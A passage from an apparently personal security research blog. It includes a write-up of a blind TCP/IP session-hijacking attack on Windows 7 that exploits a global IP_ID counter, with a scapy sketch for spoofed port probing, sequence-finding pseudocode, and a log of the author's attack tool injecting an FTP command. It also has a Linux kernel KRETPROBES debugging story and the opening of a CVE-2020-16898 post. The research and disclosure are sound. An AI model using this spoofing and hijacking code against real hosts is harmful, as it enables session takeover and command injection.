However, I don’t remember if I found it during my work related to LKRG, so I’m not counting it here (otherwise it would be a total of 8 bugs, 5 of them with CVE numbers).

Those are pretty bad stats… However, they make for an interesting story to tell during the announcement of the new LKRG version, and could also make for an interesting conference talk.

Full announcement can be read here:
https://www.openwall.com/lists/announce/2021/04/12/1

Best regards,
Adam

Windows 7 TCP/IP hijacking

By: pi3
24 January 2021 at 18:18

Blind TCP/IP hijacking is still alive on Windows 7… and not only there. This version of Windows is certainly one of the “juiciest” targets even though January 14th, 2020 was its official EOL (End Of Life) date. Based on various data, Windows 7 holds around a 25% share of the Operating System (OS) market and is still the world’s second most popular desktop operating system.

A little bit of history

It was a few months before I joined Microsoft as a Security Software Engineer in 2012 when I sent them a report with an interesting bug/vulnerability in all versions of Microsoft Windows, including Windows 7 (the latest version at that time). It was an issue in the implementation of the TCP/IP stack allowing attackers to carry out a blind TCP/IP hijacking attack. During my discussion with MSRC (Microsoft Security Response Center), they acknowledged that the bug exists, but they had their doubts about the impact of the issue, claiming “it is very difficult and very unreliable” to exploit. Therefore, they were not going to address it in the current OSes; however, they would fix it in the upcoming OS which was going to be released soon (Windows 8).

I didn’t agree with MSRC’s evaluation. In 2008 I had developed a fully working PoC which would automatically find all the necessary primitives (client’s port, SQN and ACK) to perform a blind TCP/IP hijacking attack. This tool exploited exactly the same weaknesses in the TCP/IP stack which I had reported. That being said, Microsoft informed me that if I shared my tool (I didn’t want to do that), they would reconsider their decision. For now, however, no CVE would be allocated, and this problem was supposed to be addressed in Windows 8.

In the following months I started my work as an FTE (Full Time Employee) for Microsoft, and I verified that this problem was fixed in Windows 8. Over the course of the years, I completely forgot about it. Nevertheless, when I left Microsoft and was doing some cleanups on my old laptop, I found my old tool. I copied it from the laptop and decided to revisit it once I had a bit more time. Eventually I found that time, and thought that my tool deserved a release and a proper description.

What is TCP/IP hijacking?

Most readers are likely aware of what this is. For those who aren’t, I encourage you to read one of the many great articles about it which you can find on the internet these days.

It might be worth mentioning that probably the most famous blind TCP/IP hijacking attack was performed by Kevin Mitnick against the computers of Tsutomu Shimomura at the San Diego Supercomputer Center on Christmas Day, 1994.

This is a VERY old-school technique which nobody expects to be alive in 2021… Yet, it’s still possible to perform TCP/IP session hijacking today without attacking the PRNG responsible for generating the initial TCP sequence numbers (ISNs).

What is the impact of TCP/IP hijacking nowadays?

(Un)fortunately, it is not as catastrophic as it used to be. The main reason is that the majority of modern protocols implement encryption. Sure, it’s overwhelmingly bad if an attacker can hijack any established TCP/IP session. However, if the upper-layer protocols properly implement encryption, attackers are limited in what they can do with it, unless they have the ability to correctly generate encrypted messages.

That being said, we still have widely deployed protocols which do not encrypt their traffic, e.g., FTP, SMTP, HTTP, DNS, IMAP, and more. Thankfully, protocols like Telnet or Rlogin can (hopefully?) only be seen in a museum these days.

Where is the bug?

TL;DR: In the implementation of TCP/IP stack for Windows 7, IP_ID is a global counter.

Details:

The tool which I developed in 2008 implemented a known attack described by ‘lkm’ (a typo; the author’s real nickname is ‘klm’) in Phrack issue 64, which can be read here:

http://phrack.org/issues/64/13.html

This is an amazing article and piece of research, and I encourage everyone to carefully study all the details.

Back in 2007 (and 2008), this attack could be executed successfully against many OSes that were modern at the time, including Windows 2K/XP and FreeBSD 4. I gave a live presentation of this attack against Windows XP at a local conference in Poland (SysDay 2009).

Before we move on to the details of how to perform the attack, it is useful to review in more detail how TCP handles the communication. Quoting the Phrack paper:

Each of the two hosts involved in the connection computes a 32-bit SEQ number randomly at the establishment of the connection. This initial SEQ number is called the ISN. Then, each time a host sends some packet with N bytes of data, it adds N to the SEQ number.

The sender puts his current SEQ in the SEQ field of each outgoing TCP packet. The ACK field is filled with the next expected SEQ number from the other host. Each host will maintain his own next sequence number (called SND.NEXT), and the next expected SEQ number from the other host (called RCV.NEXT).
(…)
TCP implements a flow control mechanism by defining the concept of “window”. Each host has a TCP window size (which is dynamic, specific to each TCP connection, and announced in TCP packets), that we will call RCV.WND.
At any given time, a host will accept bytes with sequence number between RCV.NXT and (RCV.NXT+RCV.WND-1). This mechanism ensures that at any time, there can be no more than RCV.WND bytes “in transit” to the host.

In short, in order to execute TCP/IP hijacking attack, we must know:

  • Client IP
  • Server IP (usually known)
  • Client port
  • Server port (usually known)
  • Sequence number of the client
  • Sequence number of the server

OK, but what does this have to do with IP_ID?

In 1998(!), Salvatore Sanfilippo (aka antirez) posted to the Bugtraq mailing list a description of a new port scanning technique, known today as the “Idle scan”. The original post can be found here:

https://seclists.org/bugtraq/1998/Dec/79

and more information about the Idle scan can be found here:

https://nmap.org/book/idlescan.html

In short, if IP_ID is implemented as a global counter (which is the case, e.g., in Windows 7), it is simply incremented with each sent IP packet. By “probing” the victim’s IP_ID we know how many packets have been sent between each “probe”. Such “probing” can be performed by sending the victim any packet which results in a reply to the attacker. ‘lkm’ suggests using an ICMP packet, but it can be any packet with an IP header:

[===================================================================]
attacker                                  Host
                --[PING]->
        <-[PING REPLY, IP_ID=1000]--

          ... wait a little ... 

                --[PING]->
        <-[PING REPLY, IP_ID=1010]-- 

<attacker> Uh oh, the Host sent 9 IP packets between my pings.
[===================================================================]

This essentially creates a form of “covert channel” which can be exploited by a remote attacker to “discover” all the information necessary to execute a TCP/IP hijacking attack. How? Let’s quote the original Phrack article:

Discovering client’s port

Assuming we already know the client/server IP, and the server port, there’s a well known method to test if a given port is the correct client port. In order to do this, we can send a TCP packet with the SYN flag set to server-IP:server-port, from client-IP:guessed-client-port (we need to be able to send spoofed IP packets for this technique to work).

When the attacker guesses the valid client port, the server replies to the real client (not the attacker) with an ACK that matches the established connection, so the client stays silent. If the port was incorrect, the server replies to the real client with SYN+ACK; the real client didn’t start a new connection, so it replies to the server with an RST.

So, all we have to do to test whether a guessed client-port is the correct one is (see the sketch after this list):

– Send a PING to the client, note the IP ID
– Send our spoofed SYN packet
– Resend a PING to the client, note the new IP ID
– Compare the two IP IDs to determine if the guessed port was correct.
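Translated into code, the port check could look roughly like this (a minimal scapy sketch assuming an otherwise idle Windows 7 victim; the function names are mine):

from scapy.all import IP, TCP, ICMP, sr1, send

def probe_ip_id(victim):
    # Read the victim's global IP_ID counter via a ping
    reply = sr1(IP(dst=victim) / ICMP(), timeout=1, verbose=False)
    return reply[IP].id

def client_port_active(client, server, guessed_port, server_port=21):
    before = probe_ip_id(client)
    # Spoof a SYN "from" the client towards the server
    send(IP(src=client, dst=server) /
         TCP(sport=guessed_port, dport=server_port, flags="S"), verbose=False)
    after = probe_ip_id(client)
    # Right guess: the client stays silent, only our ping reply counts (+1).
    # Wrong guess: the client also answers the server's SYN+ACK with an RST (+2).
    return (after - before) % 0x10000 == 1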

Finding the server’s SND.NEXT

This is the essential part, and the best I can do is to quote (again) the Phrack article:

Whenever a host receives a TCP packet with the good source/destination ports, but an incorrect seq and/or ack, it sends back a simple ACK with the correct SEQ/ACK numbers. Before we investigate this matter, let’s define exactly what a correct seq/ack combination is, as defined by RFC 793 [2]:

A correct SEQ is a SEQ which is between the RCV.NEXT and (RCV.NEXT+RCV.WND-1) of the host receiving the packet. Typically, the RCV.WND is a fairly large number (several dozens of kilobytes at least).

A correct ACK is an ACK which corresponds to a sequence number of something the host receiving the ACK has already sent. That is, the ACK field of the packet received by a host must be lower than or equal to the host’s own current SND.SEQ, otherwise the ACK is invalid (you can’t acknowledge data that were never sent!).

It is important to note that the sequence number space is “circular”. For example, the condition used by the receiving host to check the ACK validity is not simply the unsigned comparison “ACK <= receiver’s SND.NEXT”, but the signed comparison “(ACK - receiver’s SND.NEXT) <= 0”.

Now, let’s return to our original problem: we want to guess server’s SND.NEXT. We know that if we send a wrong SEQ or ACK to the client from the server, the client will send back an ACK, while if we guess right, the client will send nothing. As for the client-port detection, this may be tested with the IP ID.

If we look at the ACK checking formula, we note that if we randomly pick two ACK values, let’s call them ack1 and ack2, such that |ack1 - ack2| = 2^31, then exactly one of them will be valid. For example, let ack1 = 0 and ack2 = 2^31. If the real ACK is between 1 and 2^31, then ack2 will be an acceptable ACK. If the real ACK is 0, or is between (2^31 + 1) and (2^32 - 1), then ack1 will be acceptable.

Taking this into consideration, we can more easily scan the sequence number space to find the server’s SND.NEXT. Each guess will involve sending two packets, each with its SEQ field set to the guessed server’s SND.NEXT. The first packet (resp. the second packet) will have its ACK field set to ack1 (resp. ack2), so that we are sure that if the guessed SND.NEXT is correct, at least one of the two packets will be accepted.

The sequence number space is way bigger than the client-port space, but two facts make this scan easier:

First, when the client receives our packet, it replies immediately. There’s no problem with latency between the client and the server like in the client-port scan. Thus, the time between the two IP ID probes can be very small, speeding up our scanning and greatly reducing the odds that the client will have other IP traffic between our probes and mess with our detection.

Secondly, it’s not necessary to test all the possible sequence numbers, because of the receiver’s window. In fact, we only need to do approx. (2^32 / client’s RCV.WND) guesses at worst (this fact has already been mentioned in [6]). Of course, we don’t know the client’s RCV.WND.
We can take a wild guess of RCV.WND = 64K and perform the scan, trying each SEQ multiple of 64K. Then, if we didn’t find anything, we can try all SEQs such that seq = 32K + i*64K for all i. Then all SEQs such that seq = 16K + i*32K, and so on… narrowing the window while avoiding re-testing already-tried SEQs. On a typical “modern” connection, this scan usually takes less than 15 minutes with our tool.
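Put together, the quoted window scan boils down to something like the sketch below, where seq_oracle would be built on the same IP_ID probing as before and returns True when the client stays silent:

ACK1, ACK2 = 0, 1 << 31           # exactly one of the two is always acceptable

def scan_server_snd_next(seq_oracle, wnd=0x10000):
    # One guess per assumed receive window; a silent client means the
    # guessed SEQ landed inside [RCV.NXT, RCV.NXT + RCV.WND).
    for seq in range(0, 1 << 32, wnd):
        if seq_oracle(seq, ACK1) or seq_oracle(seq, ACK2):
            return seq
    return None                    # narrow the window and rescan, as described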

With the server’s SND.NEXT known, and a method to work around our ignorance of the ACK, we may hijack the connection in the “server -> client” direction. This is not bad, but not terribly useful; we’d prefer to be able to send data from the client to the server, to make the client execute a command, etc… In order to do this, we need to find the client’s SND.NEXT.

And here is a small, weird difference in Windows 7. The described scenario works perfectly against Windows XP, but I encountered different behavior on Windows 7. Using the two edge-case ACK values to satisfy the ACK formula doesn’t really change anything there; I got exactly the same results (just on Windows 7) by always using only one of the edge values for the ACK. Originally, I thought my implementation of the attack wasn’t working against Windows 7. However, after some tests and tuning it turned out that’s not the case. I’m not sure why, or what I’m missing, but in the end you can send half as many packets and speed up the overall attack.

Finding the client’s SND.NEXT

Quote:

What can we do to find the client’s SND.NEXT? Obviously we can’t use the same method as for the server’s SND.NEXT, because the server’s OS is probably not vulnerable to this attack, and besides, the heavy network traffic on the server would render the IP ID analysis infeasible.

However, we know the server’s SND.NEXT. We also know that the client’s SND.NEXT is used for checking the ACK fields of client’s incoming packets.
So we can send packets from the server to the client with SEQ field set to server’s SND.NEXT, pick an ACK, and determine (again with IP ID) if our ACK was acceptable.

If we detect that our ACK was acceptable, that means that (guessed_ACK - SND.NEXT) <= 0. Otherwise, it means… well, you guessed it, that (guessed_ACK - SND.NEXT) > 0.

Using this knowledge, we can find the exact SND.NEXT in at most 32 tries by doing a binary search (a slightly modified one, because the sequence number space is circular).

Now, at last, we have all the required information and we can perform the session hijacking from either the client or the server side.
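The circular binary search from the quote can be sketched as follows, assuming ack_accepted is an IP_ID oracle that returns True when the client stays silent, and valid_ack is any ACK already known to be acceptable (as the next paragraph explains, this particular oracle does not work against Windows 7):

MOD = 1 << 32

def find_client_snd_next(valid_ack, ack_accepted):
    # SND.NEXT lies in [valid_ack, valid_ack + 2^31) mod 2^32, because
    # (valid_ack - SND.NEXT) <= 0 holds in signed 32-bit arithmetic.
    lo, hi = 0, 1 << 31                     # offsets relative to valid_ack
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if ack_accepted((valid_ack + mid) % MOD):
            lo = mid                        # still at or below SND.NEXT
        else:
            hi = mid                        # overshot SND.NEXT
    return (valid_ack + lo) % MOD           # at most ~31 oracle queries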

(Un)fortunately, here Windows 7 is different as well. This is connected to the differences in the previous stage, in how it handles the correctness of the ACK. Regardless of the guessed_ACK value ((guessed_ACK - SND.NEXT) <= 0 or (guessed_ACK - SND.NEXT) > 0), Windows 7 won’t send any packet back to the server. Essentially, we are blind here and we can’t use the same amazingly effective binary search to find the correct ACK. However, we are not completely lost. We can always brute-force the ACK if we have the correct SQN. Again, we don’t need to verify every possible value of the ACK; we can still use the same trick with the TCP window size. Nevertheless, to be more effective and not miss the correct ACK bracket, I’ve chosen a window size value of 0x3FF. Essentially, we flood the server with spoofed packets containing our payload for injection, with the correct SQN and a guessed ACK. This operation takes around 5 minutes and is effective 🙂 Nevertheless, if for any reason your payload is not injected, a smaller TCP window size (e.g., 0xFF) should be chosen.

Important notes

  1. This type of attack is not limited to any specific OS, but rather leverages the “covert channel” created by implementing IP_ID as a global counter. In short, any OS which is vulnerable to the “Idle scan” is also vulnerable to the old-school blind TCP/IP hijacking attack.
  2. We need to be able to send spoofed IP packets to execute this attack.
  3. Our attack relies on “scanning” and constant “poking” of the IP_ID:
    • Any latency between the victim and the server affects such logic.
    • If the victim’s machine is overloaded (heavy or slow traffic), it obviously affects the attack. Taking appropriate measurements of the victim’s networking performance might be necessary for correct tuning of the attack.

Proof-of-Concept

Originally, I implemented lkm’s attack in 2008 and tested it against Windows XP. When I ran the compiled binary on a modern system, everything was working fine. However, when I took the original sources and recompiled them in a modern Linux environment, my tool stopped working(!). The new binary was not able to find the client’s port nor the SQN. However, the old binary still worked perfectly fine. What was really happening was a riddle to me. The output of the strace tool gave me some clues:

Generated packet from the old binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\353\234\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=24, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=24, msg_flags=0}, 0) = 40

Generated packet from the new binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\2563\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=28, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=32, msg_flags=0}, 0) = 40

cmsg_len and msg_controllen have different values. However, I didn’t modify the source code, so how is this possible? Some GCC/glibc changes broke the functionality of sending the spoofed packet. I found the answer here:

https://sourceware.org/pipermail/libc-alpha/2016-May/071274.html

I needed to rewrite the spoofing function to make it work again in a modern Linux environment. However, to do that I needed to use a different API. I wonder how many non-offensive tools were broken by this change 🙂

Windows 7

I’ve tested this tool against a fully updated Windows 7. Surprisingly, rewriting the PoC was not the most difficult task… setting up a fully updated Windows 7 was much more problematic. Many updates break the update channel/service(!) itself, and you need to fix it manually. Usually, this means manually downloading a specific KB and installing it in “safe mode”. That can “unlock” the update service so you can continue your work. In the end, it took me around 2-3 days to get a fully updated Windows 7, and the setup looks like this:

192.168.1.132 – attacker’s IP address
192.168.1.238 – victim’s Windows 7 machine IP address
192.168.1.169 – FTP server running on Linux. I’ve tested the ProFTPd and vsFTPd servers running under a git top-of-tree kernel (5.11+)

This tool does not do appropriate per-victim “tuning”, which could significantly speed up the attack. However, in my specific case the full attack, which means finding the client’s port, the server’s SQN, and the client’s SQN, took about 45 minutes.

I found old logs from attacking Windows XP (~2009) where the entire attack took almost an hour:

pi3-darkstar z_new # time ./test -r 192.168.254.20 -s 192.168.254.46 -l 192.168.254.31 -p 21 -P 5357 -c 49450 -C “PWD”

                …::: -=[ [d]evil_pi3 TCP/IP Blind Spoofer by Adam ‘pi3’ Zabrocki ]=- :::…

        [+] Trying to find client port
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [+] Second level of verifcation
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [!!] Port is found (49456)! Let’s go further…

        [+] Trying to find server’s window SQN
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535
        [+] Rechecking…
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535

        [!!] SQN => 1874825280, with seq_offset => 65535

        [+] Trying to find server’s real SQN
        [+] Found server’s real SQN => 1874825279 => seq_offset 32767
        [+] Found server’s real SQN => 1874825277 => seq_offset 16383
        [+] Found server’s real SQN => 1874825275 => seq_offset 8191
        [+] Found server’s real SQN => 1874825273 => seq_offset 4095
        [+] Found server’s real SQN => 1874823224 => seq_offset 2047
        [+] Found server’s real SQN => 1874822199 => seq_offset 1023
        [+] Found server’s real SQN => 1874821686 => seq_offset 511
        [+] Found server’s real SQN => 1874821684 => seq_offset 255
        [+] Found server’s real SQN => 1874821555 => seq_offset 127
        [+] Found server’s real SQN => 1874821553 => seq_offset 63
        [+] Found server’s real SQN => 1874821520 => seq_offset 31
        [+] Found server’s real SQN => 1874821518 => seq_offset 15
        [+] Found server’s real SQN => 1874821509 => seq_offset 7
        [+] Found server’s real SQN => 1874821507 => seq_offset 3
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Rechecking…
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1

        [!!] Real server’s SQN => 1874821505

        [+] Finish! check whether command was injected (should be :))

        [!] Next SQN [1874822706]

real    56m38.321s
user    0m8.955s
sys     0m29.181s
pi3-darkstar z_new #

Some more notes:

  • Sometimes you can see the tool spinning around the same value when trying to find the “server’s real SQN”. If you see the number 1 next to the number in the parentheses, kill the attack, copy the calculated SQN (the one around which the tool was spinning) and pass it as the SQN start parameter (-M). It should fix that edge case.
  • Sometimes scanning with a 64KB window size can ‘overjump’ the appropriate SQN bracket, so you might want to reduce the window size. The tool should shrink the window size automatically whenever it finishes scanning the full SQN range with the current window size without finding the correct value; nevertheless, that takes time, so you might want to start scanning with a smaller window size in the first place (which implies a longer attack).
  • By default, the tool sends an ICMP message to the victim’s machine to read the IP_ID. However, I’ve implemented functionality to read that field from any IP packet: the tool sends a standard SYN packet and waits for the reply to extract the IP_ID. Please provide an appropriate TCP port via the corresponding parameter (-P).

Tool can be found here:

http://site.pi3.com.pl/exp/devil_pi3.c

Closing words

Modern operating systems (like Windows 10) usually implement IP_ID as a “local” counter per session. If you monitor the IP_ID of a specific session, you can see it is simply incremented with each sent packet; however, each session has an independent IP_ID base.

Happy hacking,
Adam

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel

By: pi3
15 December 2020 at 19:34


During the LKRG development process I’ve found that:

  • KRETPROBES are broken since kernel 5.8 (fixed in upcoming kernel)
  • OPTIMIZER was not doing a sufficient job since kernel 5.5

First things first – KPROBES and FTRACE:

Linux kernel provides 2 amazing frameworks for hooking – K*PROBES and FTRACE. K*PROBES is the older, classic one – introduced in 2.6.9 (October 2004). FTRACE is a newer interface and might have smaller overhead compared to K*PROBES. I’m using the word “K*PROBES” because various types of K*PROBES have been available in the kernel, including JPROBES, KRETPROBES and classic KPROBES. K*PROBES essentially enables the possibility to dynamically break into any kernel routine. What are the differences between the various K*PROBES?

  • KPROBES – can be placed on virtually any instruction in the kernel
  • JPROBES – were implemented using KPROBES. The main idea behind JPROBES was to employ a simple mirroring principle to allow seamless access to the probed function’s arguments. However, in 2017 JPROBES were deprecated. More information can be found here:
    https://lwn.net/Articles/735667/
  • KRETPROBES – sometimes called “return probes”; they also use KPROBES under the hood. KRETPROBES allow you to easily execute your own routine on the entry and return paths of the hooked function. However, KRETPROBES can’t be placed on arbitrary instructions.

When a KPROBE is registered, it makes a copy of the probed instruction and replaces the first byte(s) of the probed instruction with a breakpoint instruction (e.g., int3 on i386 and x86_64).

FTRACE is newer compared to K*PROBES and was initially introduced in kernel 2.6.27, which was released on October 9, 2008. FTRACE works completely differently: the main idea is based on instrumenting every compiled function (injecting a “long-NOP” instruction – GCC’s option “-pg”). When FTRACE is registered on a specific function, that “long-NOP” is replaced with a JUMP instruction which points to the trampoline code. Such a trampoline can then execute any pre-registered user-defined hook.

A few words about Linux Kernel Runtime Guard (LKRG)

In short, LKRG performs runtime integrity checking of the Linux kernel (similar to the PatchGuard technology from Microsoft) and detection of various exploits against the kernel. LKRG attempts to post-detect and promptly respond to unauthorized modifications to the running Linux kernel (system integrity) or to corruption of task integrity such as credentials (user/group IDs), SECCOMP/sandbox rules, namespaces, and more.
To be able to implement such functionality, LKRG must place various hooks in the kernel. KRETPROBES are used to fulfill that requirement.

LKRG’s KPROBE on FTRACE instrumented functions

A careful reader might ask an interesting question: what happens if a function is instrumented by FTRACE (with the “long-NOP” injected) and someone registers K*PROBES on it? Does a dynamically registered FTRACE “overwrite” K*PROBES installed on that function, and vice versa?

Well, this is a very common situation from LKRG’s perspective, since it places KRETPROBES on many syscalls. The Linux kernel uses a special type of K*PROBES in such cases, called “FTRACE-based KPROBES”. Essentially, such a special KPROBE uses the FTRACE infrastructure and has very little to do with KPROBES itself. That’s interesting because it is also subject to FTRACE rules, e.g., if you disable the FTRACE infrastructure, such a special KPROBE won’t work either.

OPTIMIZER

Linux kernel developers went one step further, and they aggressively “optimize” all K*PROBES to use FTRACE instead. The main reason behind that is performance: FTRACE has smaller overhead. If for any reason such a KPROBE can’t be optimized, the classic old-school KPROBES infrastructure is used.

When you analyze all KRETPROBES placed by LKRG, you will realize that on modern kernels all of them are being converted to some type of FTRACE 🙂

LKRG reports False Positives

After such a long introduction, we can finally move on to the topic of this article. Vitaly Chikunov from ALT Linux reported that when he ran an FTRACE stress tester, LKRG reported corruption of the .text section:

https://github.com/openwall/lkrg/issues/12

I spent a few weeks (a month+) on making LKRG detect and accept authorized third-party modifications to the kernel’s code placed via FTRACE. When I finally finished that work, I realized that I additionally needed to protect the global FTRACE knob (sysctl kernel.ftrace_enabled), which allows root to completely disable FTRACE on a running system. Otherwise, LKRG’s hooks might be unknowingly disabled, which not only disables its protections (kind of OK under a threat model where we trust host root), but may also lead to false positives (as without the hooks LKRG wouldn’t know which modifications are legitimate). I added that functionality, and everything was working fine…
… until kernel 5.9. This completely surprised me. I hadn’t seen any significant changes in the FTRACE logic between 5.8.x and 5.9.x. I spent some time on that, and finally realized that my protection of the global FTRACE knob had stopped working on the latest kernels (since 5.9), even though this code was not changed between kernels 5.8.x and 5.9.x. What’s the mystery?

First problem – KRETPROBES are broken.

Starting from kernel 5.8, all non-optimized KRETPROBES don’t work. Until 5.8, when the INT3 (#BP) exception was raised, entry to the NMI was not fully performed. Among others, the following logic was executed:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L589

if (!user_mode(regs)) {
    rcu_nmi_enter();
    preempt_disable();
}

In some older kernels function ist_enter() was called instead. Inside this function we can see the following logic:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L91

if (user_mode(regs)) {
    RCU_LOCKDEP_WARN(!rcu_is_watching(), "entry code didn't wake RCU");
} else {
    /*
     * We might have interrupted pretty much anything.  In
     * fact, if we're a machine check, we can even interrupt
     * NMI processing.  We don't want in_nmi() to return true,
     * but we need to notify RCU.
     */
    rcu_nmi_enter();
}

preempt_disable();

As the comment says “We don’t want in_nmi() to return true, but we need to notify RCU.“. However, since kernel 5.8 the logic of how interrupts are handled was modified and currently we have this (function “exc_int3“):
https://elixir.bootlin.com/linux/v5.8/source/arch/x86/kernel/traps.c#L630

/*
 * idtentry_enter_user() uses static_branch_{,un}likely() and therefore
 * can trigger INT3, hence poke_int3_handler() must be done
 * before. If the entry came from kernel mode, then use nmi_enter()
 * because the INT3 could have been hit in any context including
 * NMI.
 */
if (user_mode(regs)) {
    idtentry_enter_user(regs);
    instrumentation_begin();
    do_int3_user(regs);
    instrumentation_end();
    idtentry_exit_user(regs);
} else {
    nmi_enter();
    instrumentation_begin();
    trace_hardirqs_off_finish();
    if (!do_int3(regs))
        die("int3", regs, 0);
    if (regs->flags & X86_EFLAGS_IF)
        trace_hardirqs_on_prepare();
    instrumentation_end();
    nmi_exit();
}

The root of the unlucky change comes from this commit:

https://github.com/torvalds/linux/commit/0d00449c7a28a1514595630735df383dec606812#diff-51ce909c2f65ed9cc668bc36cc3c18528541d8a10e84287874cd37a5918abae5

which was later modified by this commit:

https://github.com/torvalds/linux/commit/8edd7e37aed8b9df938a63f0b0259c70569ce3d2

and this is what we currently have in all kernels since 5.8. Essentially, KRETPROBES are not working since these commits. We have the following logic:

asm_exc_int3() -> exc_int3():
                    |
    ----------------|
    |
    v
...
nmi_enter();
...
if (!do_int3(regs))
       |
  -----|
  |
  v
do_int3() -> kprobe_int3_handler():
                    |
    ----------------|
    |
    v
...
if (!p->pre_handler || !p->pre_handler(p, regs))
                             |
    -------------------------|
    |
    v
...
pre_handler_kretprobe():
...
    if (unlikely(in_nmi())) {
        rp->nmissed++;
        return 0;
    }

Essentially, exc_int3() calls nmi_enter(), and pre_handler_kretprobe(), before invoking any registered KRETPROBE handler, verifies via the in_nmi() call that it is not running in an NMI.

I reported this issue to the maintainers, and it was addressed and correctly fixed. These patches are going to be backported to the stable tree (and hopefully to the LTS kernels as well):

https://lists.openwall.net/linux-kernel/2020/12/09/1313

However, coming back to the original problem with LKRG… I didn’t see any issues with kernel 5.8.x, only with 5.9.x. That’s interesting, because KRETPROBES were broken in 5.8.x as well. So what’s going on?

As I mentioned at the beginning of the article, K*PROBES are aggressively optimized and converted to FTRACE. In kernel 5.8.x, LKRG’s hook was correctly optimized and didn’t use KRETPROBES at all. That’s why I didn’t see any problems with this version. However, for some reason, such optimization was not possible in kernel 5.9.x. This results in placing a classic non-optimized KRETPROBE, which we know is broken.

Second problem – OPTIMIZER isn’t doing a sufficient job anymore.

I didn’t see any changes in the sources regarding the OPTIMIZER, nor in the hooked function itself. However, when I looked at the generated vmlinux binary, I saw that GCC had generated padding at the end of the hooked function using the INT3 opcode:

...
ffffffff8130528b:       41 bd f0 ff ff ff       mov    $0xfffffff0,%r13d
ffffffff81305291:       e9 fe fe ff ff          jmpq   ffffffff81305194
ffffffff81305296:       cc                      int3
ffffffff81305297:       cc                      int3
ffffffff81305298:       cc                      int3
ffffffff81305299:       cc                      int3
ffffffff8130529a:       cc                      int3
ffffffff8130529b:       cc                      int3
ffffffff8130529c:       cc                      int3
ffffffff8130529d:       cc                      int3
ffffffff8130529e:       cc                      int3
ffffffff8130529f:       cc                      int3

Such padding didn’t exist in this function in the images generated for older kernels. Nevertheless, such padding is pretty common.

OPTIMIZER logic fails here:

try_to_optimize_kprobe() -> alloc_aggr_kprobe() -> __prepare_optimized_kprobe()
-> arch_prepare_optimized_kprobe() -> can_optimize():
/* Decode instructions */
addr = paddr - offset;
while (addr < paddr - offset + size) { /* Decode until function end */
    unsigned long recovered_insn;
    if (search_exception_tables(addr))
        /*
         * Since some fixup code will jumps into this function,
         * we can't optimize kprobe in this function.
         */
        return 0;
    recovered_insn = recover_probed_instruction(buf, addr);
    if (!recovered_insn)
        return 0;
    kernel_insn_init(&insn, (void *)recovered_insn, MAX_INSN_SIZE);
    insn_get_length(&insn);
    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;
    /* Recover address */
    insn.kaddr = (void *)addr;
    insn.next_byte = (void *)(addr + insn.length);
    /* Check any instructions don't jump into target */
    if (insn_is_indirect_jump(&insn) ||
        insn_jump_into_range(&insn, paddr + INT3_INSN_SIZE,
                 DISP32_SIZE))
        return 0;
    addr += insn.length;
}

One of the checks tries to protect against the situation where another subsystem has put a breakpoint there as well:

    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;

However, that’s not the case here: INT3_INSN_OPCODE is placed at the end of the function as padding.
I wanted to find out why INT3 padding is more common in the new kernels but not in the older ones, even though I was using exactly the same compiler and linker. I started browsing commits and found this one:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7705dc8557973d8ad8f10840f61d8ec805695e9e

diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
index b06d6e1188deb..3a1a819da1376 100644
--- a/arch/x86/kernel/vmlinux.lds.S
+++ b/arch/x86/kernel/vmlinux.lds.S
@@ -144,7 +144,7 @@ SECTIONS
 		*(.text.__x86.indirect_thunk)
 		__indirect_thunk_end = .;
 #endif
-	} :text = 0x9090
+	} :text =0xcccc
 
 	/* End of text section, which should occupy whole number of pages */
 	_etext = .;

It looks like INT3 is now the default padding used by the linker.

I brought that problem up with the Linux kernel developers (the KPROBES maintainers), and Masami Hiramatsu prepared an appropriate patch which fixes it:

https://lists.openwall.net/linux-kernel/2020/12/11/265

I’ve verified it, and now it works well. Through LKRG development work, we helped identify and fix two interesting problems in the Linux kernel 🙂

Thanks,
Adam

CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability

By: pi3
16 October 2020 at 18:57

Introduction

During the last Patch Tuesday (13th of October 2020), Microsoft fixed a very interesting (and sexy) vulnerability: CVE-2020-16898 – Windows TCP/IP Remote Code Execution Vulnerability (link). Microsoft’s description of the vulnerability:

“A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.
